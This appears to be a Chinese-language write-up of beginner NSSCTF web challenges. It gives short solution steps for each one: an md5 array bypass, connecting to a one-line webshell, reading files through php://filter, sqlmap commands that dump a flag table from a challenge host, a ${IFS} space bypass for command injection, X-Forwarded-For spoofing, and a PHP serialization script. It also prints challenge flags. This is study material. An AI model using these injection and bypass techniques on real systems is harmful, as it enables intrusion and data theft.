目录
gift_F12
jicao
easy_md5
caidao
include
easy_sql
easyrce
babyrce
Do_you_know_http
ez_unserialize
gift_F12
1.开启环境
2.题目提示f12
ctrl+f 搜索flag
得到flag = "WLLMCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft}
jicao
1.开启环境
2.传参 json['x']=wllm 的json格式是 {"x":"wllm"} 
easy_md5
md5数组绕过,name用get传参,password用post传参
caidao
1.启动环境
2.看到一句话木马,使用蚁剑
3.根目录找到flag
include
1.启动环境
2.随便试试
3.利用php伪协议php://filter读取flag.php这个文件
4.base64解码
easy_sql
1.启动环境 ,有点瘆人
2.查看源代码,看到参数是wllm
3.注入成功,闭合符是单引号
4.想试试sqlmap,查看数据库名称
sqlmap.py -u http://node1.anna.nssctf.cn:28452/?wllm=1 --dbs
5.查询test_db里面的表名
sqlmap.py -u http://node1.anna.nssctf.cn:28452/?wllm=1 -D test_db --tables
6.获取字段名
sqlmap.py -u http://node1.anna.nssctf.cn:28452/?wllm=1 -D test_db -T test_tb --columns
7.获取字段内容
sqlmap.py -u http://node1.anna.nssctf.cn:28452/?wllm=1 -D test_db -T test_tb -C flag --dump
NSSCTF{975c0d49-e702-4e17-96d6-910d8fe6d630}
easyrce
1.启动环境
2.查看根目录,发现flllllaaaaaaggggggg
3.cat
babyrce
1.启动环境
2.修改cookie为admin=1
3.看这个php文件
用${IFS}代替空格
cat打开
Do_you_know_http
1.启动环境
2.bp连接,浏览器WLLM,修改UA为WLLM,看到./a.php
3.You can only read this at local! 需要本地读取。添加X-Forwarded-For:127.0.0.1
4.看到 ./secretttt.php
5.访问,得到flag
ez_unserialize
1.启动环境
2.在kali中使用dirseach扫描
3.访问robots.txt
4.访问这个文件
__construct() 构造函数:
就是一个系统已经规定其名字,并且只在new一个对象的时候自动执行的方法;对象被创建时自动调用
__destruct() 析构函数:
析构函数只有在对象被垃圾收集器收集前(即对象从内存中删除之前)才会被自动调用。析构函数允许我们在销毁一个对象之前执行一些特定的操作,例如关闭文件、释放结果集等。
5.运行脚本:
<?php
class wllm{
public $admin;
public $passwd;
public function __construct(){
$this->admin ="admin";
$this->passwd = "ctf";
}
}
$p = new wllm();
echo serialize($p);
